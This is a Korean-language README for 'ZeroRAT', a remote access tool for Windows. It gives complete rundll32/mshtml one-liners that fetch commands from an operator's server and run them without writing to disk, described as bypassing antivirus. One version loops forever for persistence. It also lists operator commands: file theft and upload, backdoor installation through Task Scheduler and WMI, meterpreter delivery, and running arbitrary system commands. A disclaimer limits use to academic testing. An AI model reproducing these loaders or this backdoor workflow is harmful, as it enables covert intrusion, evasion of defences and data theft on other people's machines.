
ZeroRAT은 Windows용 한 줄 원격 제어 도구입니다.
#ZeroRAT ##소개 Windows용 원격 제어 도구입니다. 클라이언트는 명령 한 줄만 실행하면 되며, Windows 기본 프로그램을 이용해 실행됩니다. 디스크에 파일을 쓰지 않아 원천적으로 AV 탐지를 우회하는 특성을 가집니다. 재부팅하면 무효화됩니다.
프로그램에서 download와 upload는 모두 클라이언트 기준입니다. 클라이언트가 서버에서 파일을 내려받는 것을 download라고 하고, 클라이언트가 서버로 파일을 올리는 것을 upload라고 합니다.
##설정 config.py에서 클라이언트가 접속할 주소와 백엔드 관리 비밀번호를 수정하세요. debug를 꺼 두었는지 확인하는 것도 잊지 마세요.
프로그램은 flask와 sqlite3에 의존하므로 pip로 직접 설치하세요.
##클라이언트
<ip>:<port>를 실제 접속 주소로 변경하세요.
일반 버전
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://<ip>:<port>/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){window.close();}
불사 버전
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://<ip>:<port>/connect",false);while(1){try{h.Send();B=h.ResponseText;eval(B);}catch(e){}}
##서버
백엔드: http://<ip>:<port>/server/
서버가 지원하는 명령은 다음과 같습니다.
sessions 활성 클라이언트 목록 표시use <id> id로 클라이언트 선택set <key> <value> 전역 변수 설정show globals/downloads/uploads 전역 변수, 클라이언트가 다운로드할 수 있는 파일, 클라이언트가 업로드한 파일 확인delete session 현재 클라이언트 삭제delete download/upload <id> id로 파일 삭제upfile 서버에 파일을 업로드하고 downloads 목록에 추가download download_file과 download_save_path 두 변수를 설정하면 클라이언트가 파일을 다운로드하여 download_save_path에 저장upload upload_file 변수를 설정하면 클라이언트가 해당 파일을 서버에 업로드backdoor tasks <time> Windows 작업 스케줄러를 이용해 백도어 설치, 시간 형식은 00:00backdoor wmi WMI를 이용해 백도어 설치, 매시간 한 번 실행meterpreter shellcode InstallUtil로 shellcode를 실행하는 방식으로 meterpreter 설치, 먼저 LHOST와 LPORT를 설정해야 함(migrate 이후에야 계속 명령을 수신할 수 있으며, .NET Framework 2.0에 의존)meterpreter powershell Powershell 방식으로 meterpreter 설치(powershell 1.0에 의존)위 명령 외의 입력은 모두 Windows 시스템 명령으로 실행됩니다.
명령에 대한 자세한 내용은 /static/js/xkcd_cli.js를 참조하세요.
##개발 백엔드 명령으로 클라이언트 관리 /static/js/xkcd_cli.js 백엔드 명령으로 서버 관리 /controllers/server.py 클라이언트 관리 /controllers/client.py 클라이언트 payload 생성 payload.py 데이터베이스 작업 관련 /models/
##연락처 http://5alt.me
md5_salt [AT] qq.com
##참고 자료 https://gist.github.com/subTee/f1603fa5c15d5f8825c0
http://drops.wooyun.org/tips/11764
http://drops.wooyun.org/tips/8290
http://drops.wooyun.org/tips/12354
https://github.com/chromakode/xkcdfools
http://www.kammerl.de/ascii/AsciiSignature.php
https://github.com/AlessandroZ/LaZagne
##면책 조항 본 도구를 사용할 때는 현지 법률을 준수하세요. 오직 학술 테스트 목적으로만 사용할 수 있으며, 타인의 컴퓨터를 불법적으로 제어하는 행위는 엄격히 금지됩니다. 손해가 발생할 경우 저자와는 무관합니다.
##License GPLV3
##TODO